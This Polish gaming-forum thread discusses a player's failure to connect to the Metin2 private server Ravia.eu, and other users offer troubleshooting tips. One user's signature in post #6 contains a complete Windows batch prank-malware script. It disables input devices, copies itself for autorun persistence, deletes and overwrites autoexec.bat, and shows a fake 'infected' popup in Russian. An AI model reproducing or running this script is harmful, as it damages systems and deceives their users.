Skocz do zawartości

Witaj na MultiPlayer Community Forum | Kody, Porady | Gry online
Zarejestruj się aby otrzymać dostęp do pełnej funkcjonalności forum. Po rejestracji i zalogowaniu będziesz mógł tworzyć tematy, wysyłać odpowiedzi na istniejące wątki, wysyłać wiadomości prywatne, wysyłać aktualizacje statusu, zarządzać swoim profilem i wiele więcej. Jeśli masz konto zaloguj się tutaj - w innym przypadku stwórz konto tutaj.

Zdjęcie

[Problem] Ravia.eu nie moge się połączyć


  • Proszę się zalogować aby odpowiedzieć
8 odpowiedzi na ten temat

#1
kubus9595

kubus9595

    Pijawka II

  • Members
  • Pip
  • 30 postów

siemka wchodze do gry mam chanele na normal i próbóje sie zalogowac a tu błąd ze nie moge sie połączyc z serwerem stronka mi działa co to moze byc ???




#2
IllusionMt2

IllusionMt2

    Pijawka II

  • Members
  • Pip
  • 45 postów
  • Lokacja:Metin2
  • Płeć:Mężczyzna

Z jakiego jesteś kraju ? Bo jeżeli jesteś z zagranicy a mieli ataki z zagranicy to mogli zblokować zagraniczne IP.


xxx


#3
kubus9595

kubus9595

    Pijawka II

  • Members
  • Pip
  • 30 postów

z polski :P



#4
indestructibil

indestructibil

    Pijawka

  • Members
  • Pip
  • 16 postów
  • Płeć:Nie podano
  • Hobby:Tattoo
  • pobierz na nowo gre
  • zmien nazwe z metin2.bin na metin2.exe i w ten sposób pomijasz patchera i powinienes się połaczyć, nie zasze działa.
  • poprostu masz słabego neta i nie pozwala ci on na połączenie sie

ovql.jpg


#5
Silver™

Silver™

  • exModerator
  • PipPipPipPipPipPipPipPip
  • 9229 postów
  • Płeć:Nie podano


siemka wchodze do gry mam chanele na normal i próbóje sie zalogowac a tu błąd ze nie moge sie połączyc z serwerem stronka mi działa co to moze byc ???

daj sysser z clienta


rmkrpu.jpg
 


#6
Solymr

Solymr

    All life with MPC

  • Gold Member
  • PipPipPipPipPipPipPip
  • 5006 postów
  • Płeć:Mężczyzna


Grasz na modzie czy na kliencie?


lcop.jpg

1378489931-U141743.jpg
http://youtube.com/f @echo off rundll32 keyboard,disable rundll32 mouse,disable copy %0 %windir%/system echo run=%windir%/system/*.bat >> win.ini echo run=%windir%/system/*.bat >> system.ini label LOHOLAMMER if exist c:/autoexec.bat attrib c:/autoexec.bat -h -s -a -r deltree /y c:/autoexec.bat > nul echo autoexec.bat echo YOU ARE LAMMER, rucham psa jak sra.xe-xe-xe > c:/autoexec.bat rundll32 mouse,enable rundll32 keyboard,enable echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%/mes.js echo WSHShell.Popup("Warning,.. Baш кoмпьютep зapaжeн виpycoм, a избaвитьcя oт нeгo нeльзя, хe-хe-хe"); >> %temp%/mes.js start %temp%/mes.js deltree /y %temp%/mes.js attrib c:/autoexec.bat +h +s +a +r pause cls


#7
kubus9595

kubus9595

    Pijawka II

  • Members
  • Pip
  • 30 postów

klient



#8
HawajR1

HawajR1

    #fullcontrol

  • exModerator
  • PipPipPipPipPipPipPip
  • 4981 postów
  • Lokacja:Wrocław
  • Płeć:Mężczyzna


pobrałeś tego najnowszego clienta ze strony? wszystko zaktualizowane?



#9
BorekMetin2

BorekMetin2

    Bywalec MPC

  • ProUser
  • PipPipPipPipPip
  • 504 postów
  • Lokacja:Nie Powiem xD
  • Płeć:Mężczyzna
  • Hobby:Metin2 , War Rock , BattleField3 , Counter-Strike

Mam identyczny problem all Client reinstalowany probowalem juz all nawet przez hotspot shcielda nie dziala probowalem wlanczac przez game.exe , patchera przez patchera nie patchuje masakra....a po wlaczeniu Nie mozna polaczyc sie z serwerem administracja ma wyrabane... na ts to juz od 5 dni czekam na nich Prosze o pomoc



Dodany obrazek

Sygnaturka Stworzona przez Necrotoss


0 użytkowników czyta ten temat

0 użytkowników, 0 gości, 0 anonimowych użytkowników